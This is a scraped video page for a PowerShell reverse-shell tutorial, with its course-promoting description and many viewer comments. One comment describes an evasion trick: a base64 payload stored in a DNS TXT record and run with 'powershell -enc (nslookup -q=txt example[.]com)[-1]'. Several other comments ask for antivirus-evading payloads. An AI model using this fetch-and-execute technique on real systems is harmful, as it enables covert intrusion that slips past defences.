PowerShell Hacking

Sdílet
Vložit
  • čas přidán 19. 09. 2022
  • // Membership //
    Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking videos by clicking this link: / @loiliangyang
    // Courses //
    Full Ethical Hacking Course: www.udemy.com/course/full-web...
    Full Web Ethical Hacking Course: www.udemy.com/course/full-web...
    Full Mobile Hacking Course: www.udemy.com/course/full-mob...
    // Books //
    Kali Linux Hacking: amzn.to/3IUXaJv
    Linux Basics for Hackers: amzn.to/3EzRPV6
    The Ultimate Kali Linux Book: amzn.to/3m7cutD
    // Social Links //
    Website: www.loiliangyang.com
    Facebook: / loiliangyang
    Instagram: / loiliangyang
    LinkedIn: / loiliangyang
    // Disclaimer //
    Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers.
  • Věda a technologie

Komentáře • 172

  • @LLubdeRr
    @LLubdeRr Před rokem +9

    Learned more about this topic in 8 min of this video than in two lessons with my teacher... thanks for that.

  • @scottbarker1337
    @scottbarker1337 Před rokem +1

    Just found your channel and site, I cannot watch enough. Simply fantastic tutorials and rich explaination. 10/10

  • @exploit.6848
    @exploit.6848 Před rokem +32

    Great power comes with great responsibility
    - Yes LOI sir

    • @skeeterwyh
      @skeeterwyh Před rokem +1

      This will not work if the target PC didn’t download that file

  • @longlost8424
    @longlost8424 Před rokem

    Gr8 video on how easy it is to access/control the winders remote host system. this shines such a bright light on c2c functionality vulnerabilities within winblows power shell. if only they all knew.......

  • @darknode4791
    @darknode4791 Před rokem

    Can we perform it over WAN by like ssh tunneling and then specifying the tunnel's info instead of our so that the traffic will forward to our local host only

  • @tekklov2646
    @tekklov2646 Před rokem +1

    So interesting..i use only CMD for running Scripts against the target Machine thanks for that Video ! ❤️

  • @tomasgorda
    @tomasgorda Před rokem +1

    This look really nice, but could you do the same when you have av on, running defender and blocked using of IEX ? Like windows is normally working ?

  • @PaulMG
    @PaulMG Před rokem +1

    Wow. Very interesting stuff. Very educative

  • @F0SH
    @F0SH Před rokem

    Hey, i have a question, how do i check If I got ratted. I have done the cmd comman netstat/nbf and got some stuff that said (cant obtain ownership information). I checked the tcp under them and the location and they all seem to be pretty trustable. But i am still a bit worried.

  • @YoloMoloPolo300
    @YoloMoloPolo300 Před 11 měsíci

    Add to your PowerShell command to startup chrome as well. Target runs your shortcut, lets you in still see the chrome window that they were expecting.

  • @Pentestersploit
    @Pentestersploit Před rokem

    Thanks alot for the tutorial very helpful

  • @segdesc
    @segdesc Před rokem

    How do you write on the screen?

  • @GhostByteSoldier
    @GhostByteSoldier Před 20 dny

    thats all nice but what can we actaly do when we god the reverse shell

  • @calisrox4136
    @calisrox4136 Před rokem

    daaamn, you best teacher hacker loi!!

  • @shibuadak7419
    @shibuadak7419 Před rokem

    sir please tell me how to create fund payload to bypass all av and crate it in .mp3 or .mp4 format. I need your help sir

  • @judithsalva4433
    @judithsalva4433 Před rokem

    Are we using PowerShell from linux vm or Windows vm?

  • @msmediascreenentertainment1951

    Great, please make one video for automation with Excel

  • @Jeff_Got_Keys_Pranks
    @Jeff_Got_Keys_Pranks Před rokem

    Love your programme

  • @mysony1360
    @mysony1360 Před rokem +1

    Can you please share your thoughts and knowledge about Windows Sandbox.
    If using sandbox to open malware, virus or infected files, will this stop the "infection" to go out of the sandbox?
    Does is it protect for all kinds of threats?
    And, closing the sandbox, will this delete the infection, or it may stay in the system?
    Love your videos!!!
    Thanks a bunch!!

  • @SyedKamranAhmed
    @SyedKamranAhmed Před rokem

    how to check our system is compromise or not.

  • @sbeedfair9873
    @sbeedfair9873 Před rokem

    thanks man you are great. you got a new subscriber :)

  • @mara-uo1ob
    @mara-uo1ob Před rokem

    Hi 👋 mr loh I need your advice i have 12 yrs Experience in sales marketing I want to do career conversion cyber security are you able to advise me.

  • @krotson6767
    @krotson6767 Před rokem +1

    Will any antivirus protect against this attack?

  • @jasveer2sgnr
    @jasveer2sgnr Před rokem

    How to make spynote payload FUD?

  • @tchitchuJnr
    @tchitchuJnr Před rokem +2

    i don't understand using 'hacking' word when you have direct access to a target and set it up how you need to get access to it

    • @onwongjan9621
      @onwongjan9621 Před rokem

      Glad you said that becasue i wonder the same thing.. lol..

  • @sushant7906
    @sushant7906 Před rokem

    how I begin with hacking that I learn these type of things in details ?

  • @jackofalltrades200
    @jackofalltrades200 Před rokem

    Mind to make a video on how to evade this kind of Attack? Or even remove this shell file from your PC? Incase you noticed you got fused ?

  • @jeremyrichardson24
    @jeremyrichardson24 Před rokem

    If you had something like this running on your system would it show up on the output of netstat ?

    • @architech5940
      @architech5940 Před 4 měsíci

      Yes. Changing the output requires a post exploitation binary manipulation of the netstat program itself, which is not going to be easy but can be done. Also, these powershell hacks don't actually work unless windows defender is completely off and your firewall is down. This is more for proof of concept that remote code execution is feasible once you've leveraged an exploit.

  • @respect444
    @respect444 Před rokem +1

    Tq sir..... it's hackers world...... form Anonymous.

  • @arunbonthu3182
    @arunbonthu3182 Před rokem

    good job male, thanks!

  • @t3chcs
    @t3chcs Před rokem

    can it be possible that it doesnt work for me if i use a mobile hotspot as my internet?

  • @troopsleader4066
    @troopsleader4066 Před rokem +1

    plzz make a video on scada system

  • @bulluinvestment3649
    @bulluinvestment3649 Před rokem

    LOVE💖💖💖💖from INDIA(ODISHA)

  • @mbauwuwofficial
    @mbauwuwofficial Před rokem +1

    Hello sir, how remote access android with ip addres?

  • @harshpanchal5878
    @harshpanchal5878 Před rokem +2

    You never disappoint us,
    Always love your work 🙌🏻❤️

  • @airplanemode6353
    @airplanemode6353 Před rokem

    Hey I wish you read my comment
    Can you tell us how to solve Erros in Kali Linux like if I typed a command and it didn't work because an error so how I find the solution to that error like is there a website or something like that like where I should go to find a solution for my error Because most of time when I search in Google or CZcams I actually find nothing or find a solution but it doesn't work

  • @danygreen2967
    @danygreen2967 Před rokem

    this is awesome i would like to be like you in the future .. :D

  • @bluesky8589
    @bluesky8589 Před rokem

    Hello, Are you available to chat offline about a project?

  • @rferabel
    @rferabel Před rokem

    Hello, I wish to learn cybersecurity and hacking at the same time, how can I go about it please. I have no knowledge about them

  • @jokarjapan
    @jokarjapan Před rokem

    What about windows defender real-time protection if enabled ?

    • @architech5940
      @architech5940 Před 4 měsíci

      Doesn't work. You'll never get one of these powershell listeners to work on modern systems, not happening.

  • @sentient314
    @sentient314 Před rokem +1

    Wow. This is some productive teaching shit

  • @waldemarfocht1564
    @waldemarfocht1564 Před rokem +10

    I work in the IT-Sec area and can tell you that this is not about hacking, attacking or anything like that. Only the functionality of a reverse shell is shown here.
    1. Any EDR or AV solution that says anything about itself would have prevented the download of the .ps1 file.
    2. IEX commands, with a reference to an external address, would immediately be blocked by any EDR and AV solution. Even PowerShell v7 itself blocks this.
    3. Although this is not a security mechanism, the PowerShell ExecutionPolicy would also intervene here and block the unsigned script.
    You have to be a little more imaginative.
    e.g. use base64 encoded script and work with -encodedcommand or use script blocks...
    It always works and I haven't seen an environment where it doesn't work:
    1. Host a domain
    2. Create TXT record with the base64 encoded script
    3. Then make the target system run the following command: "powershell -enc (nslookup -q=txt example[.]com)[-1]"
    In this case, nslookup resolves the domain name and gets the TXT record entered from the domain. This TXT record contains the base64 encoded script and is passed to powershell.
    So far I have not seen any EDR or AV solution that blocked this.

    • @SliderOverride
      @SliderOverride Před rokem

      To funny he calls that hacking by downloading the script and run the Script it's not Hacker Loi, it's hacker "LOL"

    • @waldemarfocht1564
      @waldemarfocht1564 Před rokem

      ​@@SliderOverride I don't understand what's wrong with that. How do automated attacks work? One attempts to trick the victim's system into executing commands it is not supposed to. In most cases, this is done by downloading and executing ready-made code. The trick is to bypass all detection mechanisms and smuggle the code past them.
      In a real scenario, an attacker would only create code tailored to the victim in exceptional cases. In most cases, the code tends to be tailored to a vulnerability that fits many victims. An OnPrem Exchange Server is particularly popular here.

    • @SliderOverride
      @SliderOverride Před rokem +1

      @@waldemarfocht1564 like start Teamviewer and enter Id haha.
      It's not hacking if someone creates self shortcut on their desktop to start download. The question is more how you get the icon on the user's desktop without his interaction
      Then you can also download other executable files and run it with a script on your computer that's not hacking

    • @testtest-ez3mp
      @testtest-ez3mp Před rokem +1

      thats smart, does this still work?

    • @waldemarfocht1564
      @waldemarfocht1564 Před rokem

      @@testtest-ez3mp yeah it still works.

  • @moujmast45
    @moujmast45 Před rokem

    Best of the best

  • @firozajilani9316
    @firozajilani9316 Před 6 měsíci

    How can I send shortcut file to any one. ??

  • @amservis8050
    @amservis8050 Před rokem

    yes..yes..perfect

  • @felixkiprop48
    @felixkiprop48 Před 10 měsíci

    Window Defender: "Am i a joke".

  • @Belkacemnotafraid
    @Belkacemnotafraid Před rokem

    hello loiliang yang we want you to put vedio about the attiny 85 digispark

  • @geekgoof7045
    @geekgoof7045 Před rokem

    Any video on how to stop someone from accessing your device?

  • @hamzarashid7579
    @hamzarashid7579 Před rokem

    I think the windwos defender is gonna pop up!!

  • @PetritK10
    @PetritK10 Před rokem

    Can you make a video about AWS Hacking, like AWSGOAT project

  • @theshyguy3
    @theshyguy3 Před 9 měsíci

    every time i try this on my main and dummy computer my dummy computer running windows says it cant connect to the remote server. plz help

  • @princesunil26k
    @princesunil26k Před měsícem

    My system been hacked like this what can i do now, please help me

  • @lazutozu2729
    @lazutozu2729 Před rokem

    The great power comes the great responsibility

  • @dr.wingkow3038
    @dr.wingkow3038 Před 11 měsíci

    Good explanation.. By the way can you make tutorial "How To Exploit Pro Ftpd and Pure Ftpd with Metaslpoitable. Thanks before.

  • @viralmoments8671
    @viralmoments8671 Před rokem

    Good video

  • @dreamkiller2693
    @dreamkiller2693 Před rokem +2

    can you hack someone outside your network using this?

  • @maximadeti8009
    @maximadeti8009 Před rokem

    Hello Sir, i just wanted my fb acc back. I no longer have acces to email and phone number. I even tried the one that u can send ur government id's but it won't go thru. I dont know what to do..i am just an ordinary people doesnt know about computer. Please help me..i watch ur reset any email episodes but dont know how to do it.

  • @devas3761
    @devas3761 Před rokem

    Hello sir our company email address is getting spoffed please help me to fix this

  • @viralmoments8671
    @viralmoments8671 Před rokem

    I would like to buy hacking course

  • @aecreation8317
    @aecreation8317 Před rokem

    First to like and comment 🔥🔥

  • @mayhem1994
    @mayhem1994 Před rokem

    love your videos aye

  • @juanjo3002
    @juanjo3002 Před rokem

    This works even with windows defender on?

  • @keremozcan4329
    @keremozcan4329 Před měsícem

    I just happened to notice 13 different powershell apps has opened on my computer and trying to find solution. Any helps? Am i under attack?

  • @hxd9321
    @hxd9321 Před rokem

    Mr hacker Loi please do an iPhone reverse shell tutorial

  • @12335mohammad
    @12335mohammad Před rokem

    ok do not forget to turn on real time and the firewall

  • @renatofreirefilho
    @renatofreirefilho Před rokem

    Excelente Loi, como sempre muito bem explicado, continue com mais exemplos utilizando o powershell, são ótimos! Obrigado.

  • @user-in9pm4sg6x
    @user-in9pm4sg6x Před rokem

    that's why I disabled ability to run powershell for users

  • @bryanb3352
    @bryanb3352 Před rokem +1

    Is any of this supposed to be surprising? Wow.. you're running powershell and downloading files. Crazy stuff.

  • @code.islife493
    @code.islife493 Před rokem +2

    Script kiddie: tries to install powercat.
    Windows defender: Pipe down little fella.

  • @AdittaChakraborty321
    @AdittaChakraborty321 Před 6 měsíci

    Goid❤❤

  • @chrisantusobogi8951
    @chrisantusobogi8951 Před rokem

    Help me to know how to mod premium paid apps from Google playstore please 🙏🙏

  • @WillSanchez1129
    @WillSanchez1129 Před 11 měsíci

    Master loi
    I truly admire and respect the skill that you have and the work you put in to getting there.
    I was wondering is there anyway that you can mentor me to make me a coder. The price doesn’t matter. I just want to Learn that trade and be swift with it. Please consider my humble request One more thing is there anyway that you can slow down just a little bit? Because I have to play your video at the slowest setting possible to be able understand

  • @viralmoments8671
    @viralmoments8671 Před rokem

    When we are chatting on whatsapp are something like that...

  • @KyleJCane
    @KyleJCane Před rokem

    Hey hacker Lili why is sometimes metasploit is not working

  • @tamboleo
    @tamboleo Před rokem +58

    So for hacking a PC you need to previously have access to that PC... Oooookayyyy... And to be on the same network... and to have Windows firewall allowing 1337 connections?? That's... just pretty specific situation no?

    • @Themusicbiz
      @Themusicbiz Před rokem +2

      Only for the 1337 h4x0rs

    • @some_random_wot_dude485
      @some_random_wot_dude485 Před rokem +7

      Just plug an USB in every computer you have access to.

    • @DestoFlix
      @DestoFlix Před rokem +4

      Bruh... Its the equivalent of being taught how to build a musket in a world where you can easily get an auto machine. Anydesk could do the same and more without setting off the anti virus.

    • @dancer_queen642
      @dancer_queen642 Před rokem +6

      Have you ever heard name of social engineering techniques?😏

    • @williamgomez6226
      @williamgomez6226 Před rokem +1

      It helps you get into hacking very effectively!!!

  • @howtodefeatgangstalking

    So we're just going to act like windows defender won't block this lol 😅

  • @user-jo4lp5ll4v
    @user-jo4lp5ll4v Před rokem

    Where are you, did you go to the moon? ❤️

  • @marshalldteach1109
    @marshalldteach1109 Před rokem

    I'm here because of Uber :D

  • @Themusicbiz
    @Themusicbiz Před rokem

    Bro you don’t need to “slow down” but pauses after periods and commas would be nice. Sounds like one run on sentence

  • @sushant7906
    @sushant7906 Před rokem

    OMG ! I just do it. That's unbelievable 😶‍🌫😶‍🌫

  • @dxddrb6557
    @dxddrb6557 Před rokem

    That was confusing lol

  • @fz7833
    @fz7833 Před rokem +1

    In 3,2,1 boom

  • @markortilla6149
    @markortilla6149 Před rokem

    Hi

  • @viralmoments8671
    @viralmoments8671 Před rokem

    But you speak very speedy

  • @IND_SUBODH_GAMING
    @IND_SUBODH_GAMING Před rokem +1

    Dear sir make a video from wifi password cracked

  • @frojas26
    @frojas26 Před rokem

    Wooooo!

  • @user-xv7di2ew6q
    @user-xv7di2ew6q Před rokem

    Please 🙏 make a tutorial about mobile Android hacking I'am so sad

  • @arghya10000
    @arghya10000 Před rokem

    😲😲😲😲 wow

  • @AbdullahDataVerse
    @AbdullahDataVerse Před rokem

    😲😲

  • @Elliottwavetheory6
    @Elliottwavetheory6 Před rokem

    Sir , this is not fair you didn't tell us the main thing ( you know lot more ways than this scriptkiddi attacks)

  • @jackofalltrades200
    @jackofalltrades200 Před rokem +11

    Ohhh! I think there's a malicious shell running on my PC because whenever I restart my PC I see a Quick she'll run a code and close.

    • @eddybash1342
      @eddybash1342 Před rokem +2

      Run only linux !

    • @hereallweek
      @hereallweek Před rokem +1

      You’re most likely fine that’s your computers bios booting up

    • @jackofalltrades200
      @jackofalltrades200 Před rokem

      @@hereallweek Bios booting up?🤣 What No! I mean after when am Running windows interface .. like 30mins after boot up! Then you'll see Both the POWERSHELL and CMD. Make a Quick Pop up! Run a code and exit

    • @jackofalltrades200
      @jackofalltrades200 Před rokem

      @@eddybash1342 what'd you mean? Run only Linux?

    • @lePoTo51
      @lePoTo51 Před rokem +1

      Can be like for me running task from the provider of the computer, HP in exemple got task opening cmd for running Diag Utility.
      What you Can Do IS scan with MalwareByte and if nothing check with Autorun, from Microsoft SysInternal lab, too see whats going on when you boot, be carefull, only disable what you are sure too understand.
      And don't panic, like a Say, maybe a diag software from the pc provider, coule bé anything like Samsung Magic,HP diag, Realktek etc...

  • @samsepiol5137
    @samsepiol5137 Před rokem

    and windows defender is a cucumber

  • @maxman126
    @maxman126 Před rokem +2

    This is just jakobys payloads ....

  • @CHATGPTBESTMARKETING
    @CHATGPTBESTMARKETING Před rokem

    Hi my boss how to hack any sellfunel

  • @NoGreedSeeds
    @NoGreedSeeds Před rokem

    Mmmmm. Power Hell. 😂

  • @hasashi_Aayu
    @hasashi_Aayu Před rokem

    everything i do gets blocked by my antivirus lol so maybe we can't hack systems which have anti virus in it

  • @Muhammed.Abd.
    @Muhammed.Abd. Před 6 měsíci

    My Windows Defender catches powercat.ps1 when downloaded.
    Category: Backdoor
    Details: This program provides remote access to the computer it is installed on.
    How do you tackle this??

  • @CYBER-HERO
    @CYBER-HERO Před rokem

    My nigga is here

  • @Naruto_Ep_tamil
    @Naruto_Ep_tamil Před rokem

    Brother my gmail is hacked they changed every data please can you get it back please

  • @shahariyardhiraj9885
    @shahariyardhiraj9885 Před rokem

    Sir I'm learning ur paid hacking udemy course for free.
    please pardon me 😅🙏